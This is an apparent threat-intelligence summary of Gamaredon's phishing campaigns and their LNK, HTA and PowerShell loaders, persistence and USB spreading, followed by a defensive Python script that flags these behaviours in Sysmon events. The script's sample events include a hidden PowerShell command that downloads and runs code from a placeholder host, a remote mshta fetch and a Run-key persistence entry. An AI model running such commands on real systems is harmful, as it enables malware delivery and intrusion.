Gamaredon, a persistent threat actor since 2013, primarily targets the government, defense, diplomacy, and media sectors by employing sophisticated tactics, such as delivering malicious LNK and XHTML files via phishing emails.
These files execute malicious payloads, enabling unauthorized access and data exfiltration. By continuously evolving their techniques, Gamaredon poses a significant threat to organizations worldwide.
Analysis of the phishing emails identified four distinct attack payloads, all delivered as email attachments and designed to trick users into executing malicious files.
Whether the victim ran an attached file directly or decompressed an archive and executed its contents, the aim was the same: compromise of the target system. Successful execution of these payloads implanted malware that enabled further malicious actions.
APT-C-53 (Gamaredon) employed spear-phishing emails carrying two main types of malicious attachment. The first was a compressed file containing a malicious LNK that uses mshta.exe to execute remote code from a specified URL.
The second was a malicious XHTML file disguised as a download confirmation message, which downloaded another compressed archive containing a malicious LNK, likewise executed via mshta.exe.
Both LNKs downloaded subsequent payloads, and the attackers used a mix of direct IP addresses and domains hosted on trycloudflare.com for communication.
The group also uses malicious LNK files carrying PowerShell commands to download payloads from trycloudflare.com; these payloads collect information such as the computer name and disk serial number and send it back to the C2 server.
The decoded responses contain malicious VBScript, which is then executed. Gamaredon likewise uses HTA files disguised as attachments to deliver payloads, leveraging legitimate tools (mshta.exe, PowerShell) to evade detection.
In another variant, a malicious LNK file deploys a multi-stage PowerShell attack: the LNK launches an initial script that writes itself to the user’s registry for persistence.
This “entry module” then spawns two background jobs: a “communication module” that retrieves commands from a C2 server and a “removable disk search module” that infects connected drives.
The communication module uses various methods to contact the C2 server, including hardcoded domains, Telegra.ph URLs, and DNS lookups. Received commands are decrypted using the system serial number and executed.
The removable disk search module creates LNK files that launch a replica of the initial script, ensuring the infection spreads to external storage. The initial script also modifies the registry so that it runs on every system boot.
360 Advanced Threat Research Institute is actively monitoring APT-C-53 (Gamaredon) and its ongoing attacks. To mitigate risks associated with these attacks, organizations should enhance email security by deploying advanced gateway solutions to filter malicious content, especially LNK files and compressed files.
Robust system and network monitoring is crucial, focusing on system startup items, registry modifications, and PowerShell script executions, while endpoint security should be strengthened by installing and updating antivirus and antimalware software.
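As an added example (not code from the original report or from 360's tooling), the following Python triages constructed Sysmon-style events for three of the behaviours described above: mshta.exe fetching a remote URL, PowerShell download commands reaching trycloudflare.com, and a PowerShell command written into a per-user Run key. The field names follow Sysmon event IDs 1 and 13, and the Run-key location, the regex patterns and every sample value are assumptions, not indicators from the report.

```python
import re

# Patterns for the behaviours the report describes. Field names follow Sysmon
# conventions; the patterns themselves are assumptions to tune to real telemetry.
MSHTA_REMOTE = re.compile(r"\bmshta(\.exe)?\b.*https?://", re.IGNORECASE)
PS_DOWNLOAD = re.compile(
    r"\bpowershell\b.*(DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)",
    re.IGNORECASE,
)
# Per-user autostart (Run key). The report only says "the user's registry",
# so this exact key is an assumption.
RUN_KEY = re.compile(r"HKU\\[^\\]+\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)


def triage_event(event):
    """Return the rule names one Sysmon-style event dict matches."""
    hits = []
    if event.get("EventID") == 1:  # process creation
        cmd = event.get("CommandLine", "")
        if MSHTA_REMOTE.search(cmd):
            hits.append("mshta_remote_url")
        if PS_DOWNLOAD.search(cmd):
            hits.append("powershell_download_cradle")
        if "trycloudflare.com" in cmd.lower():
            hits.append("trycloudflare_domain")
    elif event.get("EventID") == 13:  # registry value set
        if RUN_KEY.search(event.get("TargetObject", "")) and \
                "powershell" in event.get("Details", "").lower():
            hits.append("run_key_powershell_persistence")
    return hits


def triage(events):
    """Flatten matches over a batch of events as (RecordId, rule) pairs."""
    return [(e["RecordId"], h) for e in events for h in triage_event(e)]


# Constructed sample events (not real telemetry); hosts and SIDs are placeholders.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1,
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://placeholder.trycloudflare.com/a.hta'},
    {"RecordId": 2, "EventID": 1,
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://placeholder.trycloudflare.com/p')\""},
    {"RecordId": 3, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"powershell.exe -w hidden -ep bypass -f C:\Users\u\AppData\Local\upd.ps1"},
    {"RecordId": 4, "EventID": 1, "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for record_id, rule in triage(SAMPLE_EVENTS):
        print(f"record {record_id}: {rule}")
```

Feed it events exported from Sysmon or your SIEM as dicts with the same keys; benign records such as the fourth sample produce no hits.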